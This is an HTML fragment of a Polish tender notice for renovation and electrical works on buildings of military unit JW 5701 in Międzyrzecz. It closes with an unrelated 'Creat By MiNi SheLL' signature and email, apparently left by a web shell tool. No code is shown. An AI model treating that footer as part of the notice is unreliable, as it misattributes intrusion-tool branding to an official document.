<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia: 
-roboty rozbiórkowe - dokonanie demontażu zużytych wykładzin podłogowych PCV, rozebranie posadzek z płytek ( powierzchnie tarasowe).  Wykucie z muru ościeżnic okiennych drewnianych ( okienko podawcze )
-roboty posadzkowe: wykonanie posadzek z wykładzin obiektowych, wykonanie posadzek tarasu z płytek kamiennych. 
-roboty malarskie (wykonanie gładzi gipsowych na sufitach i ścianach, oraz na wyprawach tynkarskich - bruzdach po robotach elektrycznych, odnowienie malatury pomieszczeń parteru i I piętra , 
-roboty elektryczne ( wymiana przewodów i osprzętu instalacji elektrycznej w  pomieszczeniach budynku  wraz z rozdzielnicą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.42.10.00-4, 45.44.00.00-3, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawa elewacji budynku z naprawą instalacji elektrycznej budynku nr 67 w JW 5701 m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia: 

-roboty rozbiórkowe - dokonanie demontażu zużytej wykładziny podłogowej z PCV, skucie tynków zewnętrznych, rozebranie parapetów zewnętrznych z płytek, rozebranie ogrodzenia z siatki w ramach z kątownika. 
-roboty posadzkowe - wykonanie posadzki z wykładzin obiektowych, wykonanie posadzki antyelektrostatycznej, wykonanie posadzki podestu przed wejściem z płytek gresowych antypoślizgowych, wykonanie nawierzchni betonowych zewnętrznych. 
-murarsko-tynkarskie - wykonanie tynków  zewnętrznych kat. II na ścianach i na ościeżach okiennych i drzwiowych, na wykonanym tynku wykonanie tynku akrylowego cienkowarstwowego. 	 Wykonanie tynku akrylowego cienkowarstwowego na istniejącym słupie na uprzednio przyklejonej siatce.                                                                                                
-roboty malarskie - wykonanie gładzi gipsowych na sufitach i ścianach, oraz na wyprawach tynkarskich (bruzdach po robotach elektrycznych), odnowienie malatury pomieszczeń , malowanie opierzeń, rynien i rur spustowych po uprzednim odtłuszczeniu.
-roboty elektryczne - wymiana przewodów i osprzętu instalacji elektrycznej w  pomieszczeniach budynku wraz z rozdzielnicą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin realizacji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com